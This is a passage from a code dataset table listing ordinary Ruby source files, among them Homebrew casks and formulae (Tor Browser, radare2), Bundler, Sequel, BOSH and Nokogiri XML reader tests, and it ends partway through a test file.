hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
b98f02bc14186fb681f86e829c46c74412b0db60 | 421 | cask 'torbrowser-pt' do
version '5.5.3'
sha256 '7f18a726e4e66f9e5a6efac2c8fa86feaac0297cc9d6f8c961370d814381b764'
url "https://dist.torproject.org/torbrowser/#{version}/TorBrowser-#{version}-osx64_pt-PT.dmg"
name 'Tor Browser'
homepage 'https://www.torproject.org/projects/torbrowser.html'
license :oss
gpg "#{url}.asc",
key_id: 'ef6e286dda85ea2a4ba7de684e2c6e8793298290'
app 'TorBrowser.app'
end
| 30.071429 | 95 | 0.75772 |
61fa1889e81ea939ad2de6d2163635b61ecc1b27 | 4,594 | class Radare2 < Formula
desc "Reverse engineering framework"
homepage "https://radare.org"
revision 1
stable do
url "https://radare.mikelloc.com/get/2.8.0/radare2-2.8.0.tar.gz"
sha256 "015c0b54cbeab2f055ca45ea57675ac5fcddb9be788249143e20bb64554a769e"
resource "bindings" do
url "https://radare.mikelloc.com/get/2.8.0/radare2-bindings-2.8.0.tar.gz"
sha256 "4a3b6e8101093033342e862b6834c92072bc6d902583dbca36b45a4684a4d40f"
end
resource "extras" do
url "https://radare.mikelloc.com/get/2.8.0/radare2-extras-2.8.0.tar.gz"
sha256 "f11f16faec355eddc509e3615e42b5c9de565858d68790a5c7591b6525488f75"
end
end
bottle do
sha256 "2e54078d5cff62cd5593ba2390a0f230e334b94024954e5b6329d52c0401aafc" => :mojave
sha256 "18dad4749aba2e1d3b5ecb55a1b3c55656bf0e604fc6e739b45a249809053a98" => :high_sierra
sha256 "67705968143b7235843ad4a494ffca8bbfb886168656a4171bb730dec615a0d2" => :sierra
end
head do
url "https://github.com/radare/radare2.git"
resource "bindings" do
url "https://github.com/radare/radare2-bindings.git"
end
resource "extras" do
url "https://github.com/radare/radare2-extras.git"
end
end
depends_on "gobject-introspection" => :build
depends_on "pkg-config" => :build
depends_on "swig" => :build
depends_on "valabind" => :build
depends_on "gmp"
depends_on "jansson"
depends_on "libewf"
depends_on "libmagic"
depends_on "lua"
depends_on "openssl"
depends_on "yara"
def install
# Build Radare2 before bindings, otherwise compile = nope.
system "./configure", "--prefix=#{prefix}", "--with-openssl"
system "make", "CS_PATCHES=0"
ENV.deparallelize { system "make", "install" }
# remove leftover symlinks
# https://github.com/radare/radare2/issues/8688
rm_f bin/"r2-docker"
rm_f bin/"r2-indent"
resource("extras").stage do
ENV.append_path "PATH", bin
ENV.append_path "PKG_CONFIG_PATH", "#{lib}/pkgconfig"
(lib/"radare2/#{version}").mkpath
system "./configure", "--prefix=#{prefix}"
system "make", "R2PM_PLUGDIR=#{lib}/radare2/#{version}", "all"
system "make", "R2PM_PLUGDIR=#{lib}/radare2/#{version}", "install"
end
resource("bindings").stage do
ENV.append_path "PATH", bin
ENV.append_path "PKG_CONFIG_PATH", "#{lib}/pkgconfig"
# Language versions.
perl_version = `/usr/bin/perl -e 'printf "%vd", $^V;'`
lua_version = Formula["lua"].version.to_s.match(/\d\.\d/)
# Lazily bind to Python.
inreplace "do-swig.sh", "VALABINDFLAGS=\"\"", "VALABINDFLAGS=\"--nolibpython\""
make_binding_args = ["CFLAGS=-undefined dynamic_lookup"]
# Ensure that plugins and bindings are installed in the Cellar.
inreplace "libr/lang/p/Makefile" do |s|
s.gsub! "R2_PLUGIN_PATH=", "#R2_PLUGIN_PATH="
s.gsub! "~/.config/radare2/plugins", "#{lib}/radare2/#{version}"
end
# We don't want to place json.lua in lib/lua/#{lua_version} because
# the name is very generic, which introduces a strong possibility of
# clashes with other formulae or in general usage.
inreplace "libr/lang/p/lua.c",
'os.getenv(\"HOME\")..\"/.config/radare2/plugins/lua/?.lua;',
"\\\"#{libexec}/lua/#{lua_version}/?.lua;"
# Really the Lua libraries should be dumped in libexec too but
# since they're named fairly specifically it's semi-acceptable.
inreplace "Makefile" do |s|
s.gsub! "LUAPKG=", "#LUAPKG="
s.gsub! "${DESTDIR}$$_LUADIR", "#{lib}/lua/#{lua_version}"
s.gsub! "ls lua/*so*$$_LUAVER", "ls lua/*so"
end
make_install_args = %W[
R2_PLUGIN_PATH=#{lib}/radare2/#{version}
LUAPKG=lua-#{lua_version}
PERLPATH=#{lib}/perl5/site_perl/#{perl_version}
PYTHON_PKGDIR=#{lib}/python2.7/site-packages
RUBYPATH=#{lib}/ruby/#{RUBY_VERSION}
]
system "./configure", "--prefix=#{prefix}"
["lua", "perl", "python"].each do |binding|
system "make", "-C", binding, *make_binding_args
end
system "make"
system "make", "install", *make_install_args
# This should be being handled by the Makefile but for some reason
# it doesn't want to work. If this ever breaks it's likely because
# the Makefile has started functioning as expected & placing it in lib.
(libexec/"lua/#{lua_version}").install Dir["libr/lang/p/lua/*.lua"]
end
end
test do
assert_match "radare2 #{version}", shell_output("#{bin}/r2 -version")
end
end
| 34.80303 | 93 | 0.658903 |
f8aeba375583c23b0fd59e4f45e0d71d6955e000 | 641 | # frozen_string_literal: true
require 'test_helper'
class EpochsGeoMapHtmlErbTest < ActionDispatch::IntegrationTest
setup do
@epoch = epochs(:epoch_1)
@user = users(:users_1)
sign_in @user
end
test 'should map epoch' do
get geo_map_epoch_url(id: @epoch.id)
assert_response :success
assert_select 'a[text()=?]', 'Timeline'
assert_select 'a[href=?]', epoch_timeline_path(@epoch)
assert_select 'a[text()=?]', 'Display'
assert_select 'a[href=?]', epoch_display_path(@epoch)
assert_select 'a[text()=?]', 'Back'
assert_select '.footer>div>a', 3
assert_template 'epochs/geo_map'
end
end
| 24.653846 | 63 | 0.686427 |
38e44d24abf0e7e1a1d594928e3bbfe2cf8ff654 | 3,042 | require 'rubygems/dependency'
require 'bundler/shared_helpers'
require 'bundler/rubygems_ext'
module Bundler
class Dependency < Gem::Dependency
attr_reader :autorequire
attr_reader :groups
attr_reader :platforms
PLATFORM_MAP = {
:ruby => Gem::Platform::RUBY,
:ruby_18 => Gem::Platform::RUBY,
:ruby_19 => Gem::Platform::RUBY,
:ruby_20 => Gem::Platform::RUBY,
:ruby_21 => Gem::Platform::RUBY,
:ruby_22 => Gem::Platform::RUBY,
:mri => Gem::Platform::RUBY,
:mri_18 => Gem::Platform::RUBY,
:mri_19 => Gem::Platform::RUBY,
:mri_20 => Gem::Platform::RUBY,
:mri_21 => Gem::Platform::RUBY,
:rbx => Gem::Platform::RUBY,
:jruby => Gem::Platform::JAVA,
:jruby_18 => Gem::Platform::JAVA,
:jruby_19 => Gem::Platform::JAVA,
:mswin => Gem::Platform::MSWIN,
:mswin_18 => Gem::Platform::MSWIN,
:mswin_19 => Gem::Platform::MSWIN,
:mswin_20 => Gem::Platform::MSWIN,
:mswin_21 => Gem::Platform::MSWIN,
:mswin64 => Gem::Platform::MSWIN64,
:mswin64_19 => Gem::Platform::MSWIN64,
:mswin64_20 => Gem::Platform::MSWIN64,
:mswin64_21 => Gem::Platform::MSWIN64,
:mingw => Gem::Platform::MINGW,
:mingw_18 => Gem::Platform::MINGW,
:mingw_19 => Gem::Platform::MINGW,
:mingw_20 => Gem::Platform::MINGW,
:mingw_21 => Gem::Platform::MINGW,
:x64_mingw => Gem::Platform::X64_MINGW,
:x64_mingw_20 => Gem::Platform::X64_MINGW,
:x64_mingw_21 => Gem::Platform::X64_MINGW
}.freeze
def initialize(name, version, options = {}, &blk)
type = options["type"] || :runtime
super(name, version, type)
@autorequire = nil
@groups = Array(options["group"] || :default).map { |g| g.to_sym }
@source = options["source"]
@platforms = Array(options["platforms"])
@env = options["env"]
if options.key?('require')
@autorequire = Array(options['require'] || [])
end
end
def gem_platforms(valid_platforms)
return valid_platforms if @platforms.empty?
platforms = []
@platforms.each do |p|
platform = PLATFORM_MAP[p]
next unless valid_platforms.include?(platform)
platforms |= [platform]
end
platforms
end
def should_include?
current_env? && current_platform?
end
def current_env?
return true unless @env
if @env.is_a?(Hash)
@env.all? do |key, val|
ENV[key.to_s] && (val.is_a?(String) ? ENV[key.to_s] == val : ENV[key.to_s] =~ val)
end
else
ENV[@env.to_s]
end
end
def current_platform?
return true if @platforms.empty?
@platforms.any? { |p|
Bundler.current_ruby.send("#{p}?")
}
end
def to_lock
out = super
out << '!' if source
out << "\n"
end
def specific?
super
rescue NoMethodError
requirement != ">= 0"
end
end
end
| 28.166667 | 92 | 0.571335 |
bb66c75b9561495d5cc01bb50bbcd81576886941 | 170 | class RootController < ApplicationController
def index
# TODO: redirect to the user_sponsorship path when logged in
redirect_to user_conferences_path
end
end
| 24.285714 | 64 | 0.794118 |
1ccb4031159252079f9cb30ab397b59557e00842 | 6,557 | =begin
#Selling Partner API for Notifications
#The Selling Partner API for Notifications lets you subscribe to notifications that are relevant to a selling partner's business. Using this API you can create a destination to receive notifications, subscribe to notifications, delete notification subscriptions, and more.
OpenAPI spec version: v1
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.24
=end
require 'date'
module AmzSpApi::NotificationsApiModel
# The response schema for the deleteDestination operation.
class DeleteDestinationResponse
attr_accessor :errors
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'errors' => :'errors'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'errors' => :'Object'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `AmzSpApi::NotificationsApiModel::DeleteDestinationResponse` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `AmzSpApi::NotificationsApiModel::DeleteDestinationResponse`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'errors')
self.errors = attributes[:'errors']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
errors == o.errors
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[errors].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
elsif attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
AmzSpApi::NotificationsApiModel.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end end
end
| 31.524038 | 272 | 0.637029 |
1117003d24163eba029b5865ac3983ceaa15b7bc | 194 | FactoryGirl.define do
factory :cloud_network_floating_nuage,
:class => "ManageIQ::Providers::Nuage::NetworkManager::CloudNetwork::Floating",
:parent => :cloud_network
end
| 32.333333 | 90 | 0.706186 |
b95fb75ed5ce78a958dc690513720f0cd83d354d | 226 | module Edlink
module Entities
class Source < ApiStruct::Entity
attr_entity :id,
:name,
:status,
:created_date,
:updated_date
end
end
end | 20.545455 | 36 | 0.477876 |
18de40d8bd5720faf4d5caed63827046efac8f24 | 163 | def logger_with_no_output
logger = double('Logger').as_null_object
allow(Logger).to receive(:new).and_return(logger)
end
Before do
logger_with_no_output
end | 20.375 | 51 | 0.797546 |
6ab5933dd0957b216da448707e530bd5368cec1f | 572 | cask 'disk-arbitrator' do
version '0.5'
sha256 'dcc05e6579a7ef3835cb06beb4c9e1dcc64f01128e91fc00cfc7e3a00876fd2a'
# kainjow.com is the official download host per the vendor homepage
url "https://kainjow.com/downloads/Disk%20Arbitrator-#{version}.dmg"
name 'Disk Arbitrator'
homepage 'https://github.com/aburgh/Disk-Arbitrator'
license :bsd
app 'Disk Arbitrator.app'
uninstall launchctl: 'us.burghardt.Disk-Arbitrator',
quit: 'us.burghardt.Disk-Arbitrator'
zap delete: '~/Library/Preferences/us.burghardt.Disk-Arbitrator.plist'
end
| 31.777778 | 75 | 0.75 |
38664d0294ecd3c5d8c005ca54357e3362b42200 | 1,929 | module Regexp::Expression
class Subexpression < Regexp::Expression::Base
# Traverses the subexpression (depth-first, pre-order) and calls the given
# block for each expression with three arguments; the traversal event,
# the expression, and the index of the expression within its parent.
#
# The event argument is passed as follows:
#
# - For subexpressions, :enter upon entering the subexpression, and
# :exit upon exiting it.
#
# - For terminal expressions, :visit is called once.
#
# Returns self.
def traverse(include_self = false, &block)
return enum_for(__method__, include_self) unless block_given?
block.call(:enter, self, 0) if include_self
each_with_index do |exp, index|
if exp.terminal?
block.call(:visit, exp, index)
else
block.call(:enter, exp, index)
exp.traverse(&block)
block.call(:exit, exp, index)
end
end
block.call(:exit, self, 0) if include_self
self
end
alias :walk :traverse
# Iterates over the expressions of this expression as an array, passing
# the expression and its index within its parent to the given block.
def each_expression(include_self = false)
return enum_for(__method__, include_self) unless block_given?
traverse(include_self) do |event, exp, index|
yield(exp, index) unless event == :exit
end
end
# Returns a new array with the results of calling the given block once
# for every expression. If a block is not given, returns an array with
# each expression and its level index as an array.
def flat_map(include_self = false)
result = []
each_expression(include_self) do |exp, index|
if block_given?
result << yield(exp, index)
else
result << [exp, index]
end
end
result
end
end
end
| 29.676923 | 78 | 0.646449 |
e83620fa2b26054116ac3104ac5ca03d5eb51d12 | 766 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/automl/v1/annotation_spec.proto
require 'google/protobuf'
require 'google/api/resource_pb'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/cloud/automl/v1/annotation_spec.proto", :syntax => :proto3) do
add_message "google.cloud.automl.v1.AnnotationSpec" do
optional :name, :string, 1
optional :display_name, :string, 2
optional :example_count, :int32, 9
end
end
end
module Google
module Cloud
module AutoML
module V1
AnnotationSpec = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.automl.v1.AnnotationSpec").msgclass
end
end
end
end
| 28.37037 | 131 | 0.736292 |
5db2e6aeea3c50d6703c16d53c3a65b660428871 | 2,308 | module Sequel
module Plugins
# The eager_each plugin makes calling each on an eager loaded dataset do eager loading.
# By default, each does not work on an eager loaded dataset, because each iterates
# over rows of the dataset as they come in, and to eagerly load you need to have all
# values up front. With the default associations code, you must call #all on an eagerly
# loaded dataset, as calling #each on an #eager dataset skips the eager loading, and calling
# #each on an #eager_graph dataset makes it yield plain hashes with columns from all
# tables, instead of yielding the instances of the main model.
#
# This plugin makes #each call #all for eagerly loaded datasets. As #all usually calls
# #each, this is a bit of issue, but this plugin resolves the issue by cloning the dataset
# and setting a new flag in the cloned dataset, so that each can check with the flag to
# determine whether it should call all.
#
# Usage:
#
# # Make all model subclass instances eagerly load for each (called before loading subclasses)
# Sequel::Model.plugin :eager_each
#
# # Make the Album class eagerly load for each
# Album.plugin :eager_each
module EagerEach
module DatasetMethods
# Don't call #all when attempting to load the columns.
def columns
if use_eager_all?
clone(:all_called=>true).columns
else
super
end
end
# Call #all instead of #each if eager loading,
# uless #each is being called by #all.
def each(&block)
if use_eager_all?
all(&block)
else
super
end
end
# If eager loading, clone the dataset and set a flag to let #each know not to call #all,
# to avoid the infinite loop.
def all(&block)
if use_eager_all?
clone(:all_called=>true).all(&block)
else
super
end
end
private
# Wether to use all when each is called, true when eager loading
# unless the flag has already been set.
def use_eager_all?
(opts[:eager] || opts[:eager_graph]) && !opts[:all_called]
end
end
end
end
end
| 35.507692 | 100 | 0.625217 |
011131de0b4567b7bd705baed92b9ecde03defe2 | 3,012 | # Copyright (c) 2009-2012 VMware, Inc.
module Bosh::Director
module ProblemHandlers
class InactiveDisk < Base
register_as :inactive_disk
auto_resolution :ignore
def initialize(disk_id, data)
super
@disk_id = disk_id
@data = data
@disk = Models::PersistentDisk[@disk_id]
if @disk.nil?
handler_error("Disk `#{@disk_id}' is no longer in the database")
end
if @disk.active
handler_error("Disk `#{@disk.disk_cid}' is no longer inactive")
end
@instance = @disk.instance
if @instance.nil?
handler_error("Cannot find instance for disk `#{@disk.disk_cid}'")
end
@vm = @instance.vm
end
def description
job = @instance.job || "unknown job"
index = @instance.index || "unknown index"
disk_label = "`#{@disk.disk_cid}' (#{job}/#{index}, #{@disk.size.to_i}M)"
"Disk #{disk_label} is inactive"
end
resolution :ignore do
plan { "Ignore problem" }
action { }
end
resolution :delete_disk do
plan { "Delete disk" }
action { delete_disk }
end
resolution :activate_disk do
plan { "Activate disk" }
action { activate_disk }
end
def activate_disk
unless disk_mounted?
handler_error("Disk is not mounted")
end
# Currently the director allows ONLY one persistent disk per
# instance. We are about to activate a disk but the instance already
# has an active disk.
# For now let's be conservative and return an error.
if @instance.persistent_disk
handler_error("Instance already has an active disk")
end
@disk.active = true
@disk.save
end
def delete_disk
if disk_mounted?
handler_error("Disk is currently in use")
end
if @vm
begin
cloud.detach_disk(@vm.cid, @disk.disk_cid)
rescue => e
# We are going to delete this disk anyway
# and we know it's not in use, so we can ignore
# detach errors here.
@logger.warn(e)
end
end
# FIXME: Curently there is no good way to know if delete_disk
# failed because of cloud error or because disk doesn't exist
# in vsphere_disks.
begin
cloud.delete_disk(@disk.disk_cid)
rescue Bosh::Clouds::DiskNotFound, RuntimeError => e # FIXME
@logger.warn(e)
end
@disk.destroy
end
def disk_mounted?
return false if @vm.nil?
begin
agent_timeout_guard(@vm) do |agent|
agent.list_disk.include?(@disk.disk_cid)
end
rescue RuntimeError
# old stemcells without 'list_disk' support. We need to play
# conservative and assume that the disk is mounted.
true
end
end
end
end
end
| 26.654867 | 81 | 0.569721 |
3891f41501e6a32dca20bc801e49871679c38b9d | 175 | require File.expand_path('../../../spec_helper', __FILE__)
ruby_version_is "1.9" do
describe "Dir#to_path" do
it "needs to be reviewed for spec completeness"
end
end
| 21.875 | 58 | 0.708571 |
4ab9ad8daa80f8adda637e0f5d250fd0928bc387 | 20,163 | # -*- coding: utf-8 -*-
require "helper"
module Nokogiri
module XML
class TestReader < Nokogiri::TestCase
def test_from_io_sets_io_as_source
io = File.open SNUGGLES_FILE
reader = Nokogiri::XML::Reader.from_io(io)
assert_equal io, reader.source
end
def test_empty_element?
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<xml><city>Paris</city><state/></xml>
eoxml
results = reader.map do |node|
if node.node_type == Nokogiri::XML::Node::ELEMENT_NODE
node.empty_element?
end
end
assert_equal [false, false, nil, nil, true, nil], results
end
def test_self_closing?
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<xml><city>Paris</city><state/></xml>
eoxml
results = reader.map do |node|
if node.node_type == Nokogiri::XML::Node::ELEMENT_NODE
node.self_closing?
end
end
assert_equal [false, false, nil, nil, true, nil], results
end
# Issue #831
# Make sure that the reader doesn't block reading the entire input
def test_reader_blocking
rd, wr = IO.pipe()
node_out = nil
t = Thread.start do
reader = Nokogiri::XML::Reader(rd, 'UTF-8')
reader.each do |node|
node_out = node
break
end
rd.close
end
sleep(1) # sleep for one second to make sure the reader will actually block for input
begin
wr.puts "<foo>"
wr.puts "<bar/>" * 10000
wr.flush
rescue Errno::EPIPE
end
res = t.join(5) # wait 5 seconds for the thread to finish
wr.close
refute_nil node_out, "Didn't read any nodes, exclude the trivial case"
refute_nil res, "Reader blocks trying to read the entire stream"
end
def test_reader_takes_block
options = nil
Nokogiri::XML::Reader(File.read(XML_FILE), XML_FILE) do |cfg|
options = cfg
options.nonet.nowarning.dtdattr
end
assert options.nonet?
assert options.nowarning?
assert options.dtdattr?
end
def test_nil_raises
assert_raises(ArgumentError) {
Nokogiri::XML::Reader.from_memory(nil)
}
assert_raises(ArgumentError) {
Nokogiri::XML::Reader.from_io(nil)
}
end
def test_from_io
io = File.open SNUGGLES_FILE
reader = Nokogiri::XML::Reader.from_io(io)
assert_equal false, reader.default?
assert_equal [false, false, false, false, false, false, false],
reader.map(&:default?)
end
def test_io
io = File.open SNUGGLES_FILE
reader = Nokogiri::XML::Reader(io)
assert_equal false, reader.default?
assert_equal [false, false, false, false, false, false, false],
reader.map(&:default?)
end
def test_string_io
io = StringIO.new(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
reader = Nokogiri::XML::Reader(io)
assert_equal false, reader.default?
assert_equal [false, false, false, false, false, false, false],
reader.map(&:default?)
end
class ReallyBadIO
def read(size)
'a' * size ** 10
end
end
class ReallyBadIO4Java
def read(size=1)
'a' * size ** 10
end
end
def test_io_that_reads_too_much
if Nokogiri.jruby?
io = ReallyBadIO4Java.new
Nokogiri::XML::Reader(io)
else
io = ReallyBadIO.new
Nokogiri::XML::Reader(io)
end
end
def test_in_memory
assert Nokogiri::XML::Reader(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
end
def test_reader_holds_on_to_string
xml = <<-eoxml
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
reader = Nokogiri::XML::Reader(xml)
assert_equal xml, reader.source
end
def test_default?
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
assert_equal false, reader.default?
assert_equal [false, false, false, false, false, false, false],
reader.map(&:default?)
end
def test_value?
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
assert_equal false, reader.value?
assert_equal [false, true, false, true, false, true, false],
reader.map(&:value?)
end
def test_read_error_document
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
<foo>
</x>
eoxml
assert_raises(Nokogiri::XML::SyntaxError) do
reader.each { |node| }
end
assert 1, reader.errors.length
end
def test_errors_is_an_array
reader = Nokogiri::XML::Reader(StringIO.new('&bogus;'))
assert_raises(SyntaxError) {
reader.read
}
assert_equal [SyntaxError], reader.errors.map(&:class)
end
def test_pushing_to_non_array_raises_TypeError
skip "TODO: JRuby ext does not internally call `errors`" if Nokogiri.jruby?
reader = Nokogiri::XML::Reader(StringIO.new('&bogus;'))
def reader.errors
1
end
assert_raises(TypeError) {
reader.read
}
end
def test_attributes?
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
assert_equal false, reader.attributes?
assert_equal [true, false, true, false, true, false, true],
reader.map(&:attributes?)
end
def test_attributes
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'
xmlns='http://mothership.connection.com/'
>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
assert_equal({}, reader.attributes)
assert_equal [{'xmlns:tenderlove'=>'http://tenderlovemaking.com/',
'xmlns'=>'http://mothership.connection.com/'},
{}, {"awesome"=>"true"}, {}, {"awesome"=>"true"}, {},
{'xmlns:tenderlove'=>'http://tenderlovemaking.com/',
'xmlns'=>'http://mothership.connection.com/'}],
reader.map(&:attributes)
end
def test_attribute_roundtrip
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'
xmlns='http://mothership.connection.com/'
>
<tenderlove:foo awesome='true' size='giant'>snuggles!</tenderlove:foo>
</x>
eoxml
reader.each do |node|
node.attributes.each do |key, value|
assert_equal value, node.attribute(key)
end
end
end
def test_attribute_at
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
assert_nil reader.attribute_at(nil)
assert_nil reader.attribute_at(0)
assert_equal ['http://tenderlovemaking.com/', nil, 'true', nil, 'true', nil, 'http://tenderlovemaking.com/'],
reader.map { |x| x.attribute_at(0) }
end
def test_attribute
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
assert_nil reader.attribute(nil)
assert_nil reader.attribute('awesome')
assert_equal [nil, nil, 'true', nil, 'true', nil, nil],
reader.map { |x| x.attribute('awesome') }
end
def test_attribute_length
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo awesome='true'>snuggles!</tenderlove:foo>
</x>
eoxml
assert_equal 0, reader.attribute_count
assert_equal [1, 0, 1, 0, 0, 0, 0], reader.map(&:attribute_count)
end
def test_depth
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo>snuggles!</tenderlove:foo>
</x>
eoxml
assert_equal 0, reader.depth
assert_equal [0, 1, 1, 2, 1, 1, 0], reader.map(&:depth)
end
def test_encoding
string = <<-eoxml
<awesome>
<p xml:lang="en">The quick brown fox jumps over the lazy dog.</p>
<p xml:lang="ja">日本語が上手です</p>
</awesome>
eoxml
reader = Nokogiri::XML::Reader.from_memory(string, nil, 'UTF-8')
assert_equal ['UTF-8'], reader.map(&:encoding).uniq
end
def test_xml_version
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo>snuggles!</tenderlove:foo>
</x>
eoxml
assert_nil reader.xml_version
assert_equal ['1.0'], reader.map(&:xml_version).uniq
end
def test_lang
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<awesome>
<p xml:lang="en">The quick brown fox jumps over the lazy dog.</p>
<p xml:lang="ja">日本語が上手です</p>
</awesome>
eoxml
assert_nil reader.lang
assert_equal [nil, nil, "en", "en", "en", nil, "ja", "ja", "ja", nil, nil],
reader.map(&:lang)
end
def test_value
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:tenderlove='http://tenderlovemaking.com/'>
<tenderlove:foo>snuggles!</tenderlove:foo>
</x>
eoxml
assert_nil reader.value
assert_equal [nil, "\n ", nil, "snuggles!", nil, "\n ", nil],
reader.map(&:value)
end
def test_prefix
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:edi='http://ecommerce.example.org/schema'>
<edi:foo>hello</edi:foo>
</x>
eoxml
assert_nil reader.prefix
assert_equal [nil, nil, "edi", nil, "edi", nil, nil],
reader.map(&:prefix)
end
def test_node_type
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x>
<y>hello</y>
</x>
eoxml
assert_equal 0, reader.node_type
assert_equal [1, 14, 1, 3, 15, 14, 15], reader.map(&:node_type)
end
def test_inner_xml
str = "<x><y>hello</y></x>"
